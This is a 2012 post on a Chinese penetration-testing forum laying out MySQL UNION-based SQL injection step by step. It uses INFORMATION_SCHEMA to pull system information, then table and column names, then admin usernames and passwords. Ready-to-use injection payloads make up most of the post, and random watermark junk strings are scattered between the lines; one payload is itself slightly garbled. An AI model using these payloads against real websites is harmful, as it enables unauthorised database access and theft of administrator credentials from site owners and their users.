中国网络渗透测试联盟
标题:
mysql常规注入
[打印本页]
作者:
admin
时间:
2012-9-13 17:48
标题:
mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
+ A. \ c) o' O. |8 H; S
9 d' S+ d/ f7 k
学习盲注前先了解下 IFORMATION_SCHEMA 库
, i1 S9 x0 R4 c( V9 g3 ?1 J, `
: |, a+ D8 a0 b, a4 S
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
% Q* J, Y8 @1 _( }! G, y3 J
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
* C% N3 w" @$ D3 l& \' c
1.得到所有数据库名:
4 G7 Q* `! T- Q4 B- S$ f) h
|SCHEMATA ->存储数据库名的表
3 F9 @) \( o; J, h6 s" Z
|---字段:SCHEMA_NAME ->数据库名称
0 n, \. S2 J" M3 `
* A0 Y- D3 G9 g3 z" c
|TABLES ->存储表名
& E6 d$ Q& c6 D8 t( ^" t1 I
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
% { d/ a4 Y4 m9 ~4 t0 J1 t
|---字段:TABLE_NAME ->存储表的表名
0 N( [2 C) S* ?# r1 ^
3 ~$ l5 i6 l. L I
|COLUMNS ->存储的字段名表
2 l, f: F1 G) K# C' [. D
|---字段:TABLE_SCHEMA ->该字段所属数据库名
# ?! f8 k. g4 E$ E) z! p
|---字段:TABLE_NAME ->存储所属表的名称
6 Q6 R9 _8 H$ V1 u, a9 }
4 ~+ V4 ?5 i' L
|---字段:COLUMN_NAME ->该字段的名称
4 q: y, X. Y/ t$ y
6 S( Z9 x% @/ Q! Z
" i1 e- m' Z: {: `; u6 D. k
( H8 G# [4 n2 j% o8 R
###########################################################################
+ }" O2 T# c0 T5 ?% x
N; X# s1 e/ z6 G/ G
0x001 获取系统信息:
0 o8 {- a9 L: t
; _% F9 R8 ?$ ~. w8 X/ F9 z( k
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
7 k) g+ {8 d9 _. t) b
. m0 ~8 q% N7 A9 D& ?; e
/*
! \5 ]: M) p6 e+ _% Y3 y& c
" ~" K/ V2 k0 C) Z
@@global.version_compile_os 获取系统版本
3 {' O0 F* _) P, w- [5 ^& W/ x5 E
, k n# }) M1 r
@@datadir 数据库路径
/ D5 F2 U) [ R u: {* B
database() 当前数据库名称
3 H0 Q" v- ^" ^/ Z
0x3c62723e 换行HEX值
/ w, g( ^( w) Q$ `8 B* i3 M
2 H) `% o; D( }7 f5 I0 T+ V
*/
" o+ J, D! ]" n' v/ K8 C
& N% |& _! w! o
% g% A1 y4 n" h; d
, I9 J% | n1 b/ K. e& Y
######################################################################
; Q* b( e' g% N$ L
$ _$ T5 w$ M6 j) h8 \" J7 U
0x002 获取表名
% K7 M4 J% W6 ?: q' A
2 w) T) P5 E: y; z1 l
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
- H/ i; d5 F$ _
# Y0 }0 s3 q* t9 M& _% Z* k
5 }- `5 C; d' O6 E6 z/ F
% b) _. }. [* I- Z3 V2 f
/*
9 b0 I( ]7 i$ Q- a
. G: T9 Y- T$ X5 l( U0 H
0x67617264656e 为当前数据库名
, e2 C' n& |9 i4 S% K6 Z; D& h$ n
; H" ?( J: D) q/ z7 j9 B+ m
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
8 Q7 p) R7 y) A5 T
& R/ F. f4 [/ P! I1 U. j* Z
*/
* |1 {6 v: \; t
) O7 u' V+ _& K! X/ w
######################################################################
; H2 M( ]: {. {* ^( ]
1 g( Y5 }* C. t4 c/ X" m
: H4 v& E% F/ D) F/ k* }+ [
4 J! m5 C! w/ _) _
0x003 获取字段
6 Z( Q" |7 p) L ?
; ], a' A9 K: v/ _& J7 Y
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
; e3 H! r7 F9 G3 R) w/ j) r: Y
9 B# F. {5 z+ N" Z5 S
/*
( s2 O% _& `, B9 M- S" Z5 C
1 Y% f7 E8 A' `' ]$ F* h) o
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
2 [% d+ r B1 p8 i& Y
) g/ M3 j2 H' \% N' ^- T7 T1 r2 u7 I
0x61646d696e ->选择一个表
3 t/ ?3 X2 g/ ]0 M4 o2 B
E5 W6 d* z; k( a9 K Y1 A: e
0x67617264656e ->数据库名
: _$ O+ G, g3 Y% f- T3 j/ \, c
1 A% q" P9 h* m% w, P. z( W
*/
/ T/ C# |* r' `$ m, u7 w3 D3 h3 S2 k
$ e2 r% _. I% _5 K/ e6 i5 Y
#####################################################################
: e7 g) n3 O' o& T, T# j
6 s3 X7 |+ L! ^9 @
+ r y7 L% H: \4 U' ~' w4 i
7 [6 i* F) P: k4 m
0x004 获取数据
0 s& @5 [5 b6 A
r6 r. t, W+ H r- E
union select 1,2,3
5 T. S7 H, ~* n
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
. v' e. Q$ K/ \; D \( o
/ y% }. D. N8 U
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
: k( e5 [ K; X+ \- ~" q$ T
! Z+ M3 ]% A: U2 x2 n
6 u- r5 m8 C, c) T3 ^9 ?% I
& L2 t! Q8 y- t2 n3 W
/*
, u% q# v- Y j+ C
9 m: P; j4 f" _
0x3c62723e 换行符号HEX编码
! P1 }. M- n/ X$ l$ f+ ?* K$ T
0 Z0 H( `; K+ a* J( J1 b% g7 j
group_concat 同时获得该字段所有数据
& E+ T0 ?2 J5 F" e2 s4 N4 b! ?
# S0 v; C- t4 v) r: D
*/
2 i3 d) c! n; p/ y' R
o3 Y. M R- ?. o2 L
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2